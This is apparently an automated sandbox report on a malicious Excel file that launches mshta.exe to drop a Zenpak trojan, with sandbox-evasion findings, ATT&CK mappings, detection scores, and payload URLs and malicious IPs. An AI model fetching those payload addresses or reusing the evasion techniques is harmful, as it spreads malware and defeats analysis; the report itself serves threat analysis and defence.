Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Unpacked PE file: 3.2.qDialogMainChartType.exe.10000000.3.unpack

Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_1000F6CC push esi; mov dword ptr [esp], 00000000h		3_2_1000F6CD
Source: C:\ProgramData\qDialogMainChartType.exe	Code function: 3_2_00240142 push eax; iretd		3_2_00240143

Source: initial sample

Static PE information: section name: .text entropy: 7.82504513314

Source: C:\Windows\System32\mshta.exe

File created: C:\ProgramData\qDialogMainChartType.exe

Jump to dropped file

Source: C:\Windows\System32\mshta.exe

File created: C:\ProgramData\qDialogMainChartType.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 8088
Source: unknown	Network traffic detected: HTTP traffic on port 8088 -> 49165

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe

Section loaded: OutputDebugStringW count: 505

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe	Section loaded: \KnownDlls32\Self.exE			Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe	Section loaded: \KnownDlls32\testapp.exe			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\ProgramData\qDialogMainChartType.exe	RDTSC instruction interceptor: First address: 0000000010001332 second address: 0000000010001336 instructions: 0x00000000 rdtsc 0x00000002 mov esi, eax 0x00000004 rdtsc
Source: C:\ProgramData\qDialogMainChartType.exe	RDTSC instruction interceptor: First address: 0000000010001336 second address: 0000000010001332 instructions: 0x00000000 rdtsc 0x00000002 mov edi, eax 0x00000004 xor eax, eax 0x00000006 xor edx, edx 0x00000008 sub edi, esi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e cmp eax, edi 0x00000010 cmovb eax, edi 0x00000013 cmp ecx, edi 0x00000015 cmovnbe ecx, edi 0x00000018 mov bl, byte ptr [esp+2Bh] 0x0000001c mov byte ptr [esp+3Bh], bl 0x00000020 mov edx, dword ptr [esp+08h] 0x00000024 add edx, 01h 0x00000027 mov esi, dword ptr [esp+2Ch] 0x0000002b cmp edx, esi 0x0000002d mov edi, ecx 0x0000002f mov esi, eax 0x00000031 mov dword ptr [esp+24h], edi 0x00000035 mov dword ptr [esp+18h], eax 0x00000039 mov dword ptr [esp+1Ch], ecx 0x0000003d mov dword ptr [esp+20h], esi 0x00000041 mov dword ptr [esp+14h], edx 0x00000045 je 00007FF638C6BCE3h 0x0000004b jmp 00007FF638C6BD3Dh 0x0000004d mov eax, dword ptr [esp+14h] 0x00000051 mov ecx, dword ptr [esp+1Ch] 0x00000055 mov edx, dword ptr [esp+18h] 0x00000059 mov dword ptr [esp+08h], eax 0x0000005d mov dword ptr [esp+04h], edx 0x00000061 rdtsc

Source: C:\ProgramData\qDialogMainChartType.exe

Window / User API: threadDelayed 505

Jump to behavior

Source: C:\Windows\System32\mshta.exe TID: 3048	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\ProgramData\qDialogMainChartType.exe TID: 2220	Thread sleep count: 505 > 30			Jump to behavior

Source: C:\ProgramData\qDialogMainChartType.exe	Last function: Thread delayed
Source: C:\ProgramData\qDialogMainChartType.exe	Last function: Thread delayed

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10010754 GetSystemInfo,

3_2_10010754

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10019B00 LdrInitializeThunk,

3_2_10019B00

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: 3_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_10006D50

Source: C:\Windows\System32\mshta.exe

Process created: C:\ProgramData\qDialogMainChartType.exe C:\ProgramData\qDialogMainChartType.exe

Jump to behavior

Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.2363021464.0000000000F80000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2362978626.0000000000870000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\ProgramData\qDialogMainChartType.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

3_2_10006D50

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation			Jump to behavior

Source: C:\ProgramData\qDialogMainChartType.exe

3_2_10006D50

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting32	Path Interception	Process Injection12	Disable or Modify Tools1	OS Credential Dumping	Security Software Discovery31	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution23	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion21	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Ingress Tool Transfer11	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting32	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information2	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing23	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery125	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4TWEQh2HJb.xls	28%	Virustotal		Browse
4TWEQh2HJb.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\qDialogMainChartType.exe	100%	Joe Sandbox ML
C:\ProgramData\qDialogMainChartType.exe	30%	ReversingLabs	Win32.Trojan.Zenpak

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.qDialogMainChartType.exe.10000000.3.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
onlinefastsolutions.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://fontfabrik.comQ	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/images/details.bin	0%	Avira URL Cloud	safe
http://www.tiro.com;Copyright	0%	Avira URL Cloud	safe
http://insiderushings.com:8088/js/file13.binj	0%	Avira URL Cloud	safe
http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/js/file1.bin	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/images/file13.bin	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/tpls/file3.bind	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/tpls/file3.binc	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/fonts/file8.bin	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.binQ	0%	Avira URL Cloud	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.urwpp.de	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.binX	0%	Avira URL Cloud	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://www.bethmardutho.org.P	0%	URL Reputation	safe
http://insiderushings.com:8088/js/file13.bin	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://www.ascendercorp.com/	0%	URL Reputation	safe
http://fasteasyupdates.com:8088/vendors/file4.bin	0%	Avira URL Cloud	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://www.c-and-g.co.jp	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://paymentadvisry.com:8088/wp-theme/file7.bin	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/tpls/file4.bin	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/js/file1.binT	0%	Avira URL Cloud	safe
http://onlinefastsolutions.com:8088/images/details.binG	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://onlinefastsolutions.com:8088/tpls/file3.bin	0%	Avira URL Cloud	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.htmlt	0%	URL Reputation	safe
http://buyer-remindment.com:8088/tpls/file4.bin:	0%	Avira URL Cloud	safe
http://buyer-remindment.com:8088/css/file7.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
onlinefastsolutions.com	208.83.69.35	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://onlinefastsolutions.com:8088/tpls/file3.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontfabrik.comQ	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msnbc.com/news/ticker.txt	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://onlinefastsolutions.com:8088/images/details.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.tiro.com;Copyright	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers?	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://insiderushings.com:8088/js/file13.binj	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://paymentadvisry.com:8088/wp-theme/file7.bin3.sct	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/js/file1.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.ncst.ernet.in/~rkjoshi	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.typography.netD	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/images/file13.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.bind	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binc	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com/	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://buyer-remindment.com:8088/fonts/file8.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.%s.comPA	mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binQ	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.de	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://onlinefastsolutions.com:8088/tpls/file3.binX	mshta.exe, 00000002.00000002.2362885454.000000000016F000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bethmardutho.org.P	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://insiderushings.com:8088/js/file13.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://investor.msn.com	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.galapagosdesign.com/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ascendercorp.com/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fasteasyupdates.com:8088/vendors/file4.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.c-and-g.co.jp	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	mshta.exe, 00000002.00000002.2364508774.0000000003600000.00000002.00000001.sdmp	false		high
http://paymentadvisry.com:8088/wp-theme/file7.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://buyer-remindment.com:8088/tpls/file4.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/js/file1.binT	mshta.exe, 00000002.00000002.2362845832.000000000010E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://onlinefastsolutions.com:8088/images/details.binG	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	mshta.exe, 00000002.00000002.2364760786.00000000037E7000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	mshta.exe, 00000002.00000002.2365159627.00000000039E0000.00000002.00000001.sdmp, qDialogMainChartType.exe, 00000003.00000002.2363031596.0000000001D10000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/frere-jones.html	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high
http://www.ascendercorp.com/typedesigners.htmlt	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://buyer-remindment.com:8088/tpls/file4.bin:	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://buyer-remindment.com:8088/css/file7.bin	mshta.exe, 00000002.00000002.2362981143.0000000000362000.00000004.00000001.sdmp, qRangeAutoFormatLocalFormat3.sct.0.dr	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/	mshta.exe, 00000002.00000002.2364406684.0000000003470000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
78.46.78.42	unknown	Germany	24940	HETZNER-ASDE	true
208.83.69.35	onlinefastsolutions.com	United States	22438	CLEAR-RATE-COMMUNICATIONSUS	false
202.29.60.34	unknown	Thailand	24344	CMRU-AS-APChiangmaiRajabhatUniversityTH	true
66.175.217.172	unknown	United States	63949	LINODE-APLinodeLLCUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	448885
Start date:	14.07.2021
Start time:	19:59:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	4TWEQh2HJb (renamed file extension from none to xls)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@5/2@2/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 91.1% (good quality ratio 89.8%) Quality average: 80.4% Quality standard deviation: 24.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:59:47	API Interceptor	5x Sleep call for process: mshta.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
78.46.78.42	ldE25Snd1f.exe	Get hash	malicious	Browse
	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse
208.83.69.35	BhAJLvq0c7.xls	Get hash	malicious	Browse	buyer-remindment.com:8088/js/file13.bin
208.83.69.35	bQWApID6av.xls	Get hash	malicious	Browse	buyer-remindment.com:8088/templates/file6.bin
202.29.60.34	ldE25Snd1f.exe	Get hash	malicious	Browse
	Receipt-6218387.xls	Get hash	malicious	Browse
	BhAJLvq0c7.xls	Get hash	malicious	Browse
	PFx3G8Snzk.exe	Get hash	malicious	Browse
	9EP6Gxzv6F.xls	Get hash	malicious	Browse
	2ejCKSIjIV.exe	Get hash	malicious	Browse
	bQWApID6av.xls	Get hash	malicious	Browse
66.175.217.172	ldE25Snd1f.exe	Get hash	malicious	Browse
